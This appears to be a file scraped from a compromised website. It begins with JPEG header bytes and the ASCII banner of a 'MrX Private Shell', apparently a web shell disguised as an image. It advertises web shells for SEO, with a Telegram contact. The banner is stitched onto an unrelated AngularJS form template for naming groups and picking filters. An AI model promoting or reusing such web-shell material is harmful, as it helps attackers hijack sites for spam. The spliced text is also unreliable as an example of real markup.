����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<form data-parsley-validate="" class="form-horizontal form-label-left" novalidate>
<div class="form-group">
<label class="control-label col-md-3 col-sm-3 col-xs-12" for="name">{{ lang.t("Group Name") }} <span class="required">*</span></label>
<div class="col-md-6 col-sm-6 col-xs-12">
<input id="name" required="required" class="form-control col-md-7 col-xs-12" type="text" ng-model="saveData.name" value="" />
<p class="help-block">{{ lang.t("This will be used internally for your convenience") }}</p>
</div>
</div>
<div class="form-group">
<label class="control-label col-md-3 col-sm-3 col-xs-12" for="name">{{ lang.t("Filters") }} <span class="required">*</span></label>
<div class="col-md-6 col-sm-6 col-xs-12">
<div class="pretty p-default p-curve p-smooth" ng-repeat="filter in filters">
<input type="checkbox" id="filter_{{filter._id}}" ng-checked="saveData.filters.indexOf(filter._id) > -1" ng-click="toggleFilter(filter)" value="{{ filter._id }}" />
<div class="state p-primary"><label for="filter_{{filter._id}}">{{ filter.name }} <span style="font-size: 10px;">({{ types[filter.type] }})</span></label></div>
</div>
</div>
</div>
</form>